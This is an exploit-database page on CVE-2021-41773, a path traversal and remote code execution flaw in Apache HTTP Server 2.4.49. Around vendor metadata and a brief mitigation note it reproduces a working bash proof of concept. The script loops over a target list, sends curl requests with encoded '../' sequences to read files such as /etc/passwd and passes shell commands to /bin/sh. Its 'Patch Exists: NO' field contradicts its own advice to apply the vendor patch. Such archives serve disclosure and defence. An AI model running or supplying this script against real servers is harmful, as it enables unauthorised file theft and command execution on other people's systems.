header-logo
Suggest Exploit
vendor:
Apache HTTP Server
by:
Lucas Souza
7.5
CVSS
HIGH
Path Traversal & Remote Code Execution
22
CWE
Product Name: Apache HTTP Server
Affected Version From: 2.4.49
Affected Version To: 2.4.49
Patch Exists: NO
Related CWE: CVE-2021-41773
CPE: apache_http_server:2.4.49
Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2021-41773/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2021-42013/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2021-42013/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2021-41773/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2021-42013/https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2021-42013/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2021-42013/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2021-42013/https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2021-41773/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2021-41773/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2021-41773/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2021-41773/https://www.rapid7.com/db/modules/auxiliary/scanner/http/apache_normalize_path/https://www.rapid7.com/db/modules/exploit/multi/http/apache_normalize_path_rce/
Other Scripts:
Tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Nuclei References: https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782https://nvd.nist.gov/vuln/detail/CVE-2021-41773https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773https://twitter.com/ptswarm/status/1445376079548624899https://twitter.com/h4x0r_dz/status/1445401960371429381https://github.com/blasty/CVE-2021-41773
Nuclei Metadata: {'max-request': 3, 'shodan-query': 'Apache 2.4.49', 'verified': True, 'vendor': 'apache', 'product': 'http_server'}
Platforms Tested:
2021

Apache HTTP Server 2.4.49 – Path Traversal & Remote Code Execution (RCE)

This exploit allows an attacker to perform path traversal and remote code execution on Apache HTTP Server version 2.4.49. By manipulating the path parameter, an attacker can access sensitive files on the server and execute arbitrary commands. The vulnerability is identified by CVE-2021-41773.

Mitigation:

Apply the patch provided by the vendor or upgrade to a non-affected version. Additionally, restrict access to sensitive directories and files.
Source

Exploit-DB raw data:

# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage:  https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
# Credits: Ash Daulton and the cPanel Security Team

#!/bin/bash

if [[ $1 == '' ]]; [[ $2 == '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
echo ./PoC.sh targets.txt /etc/passwd
exit
fi
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami

Navigation

Suggest Exploit

Services By CQR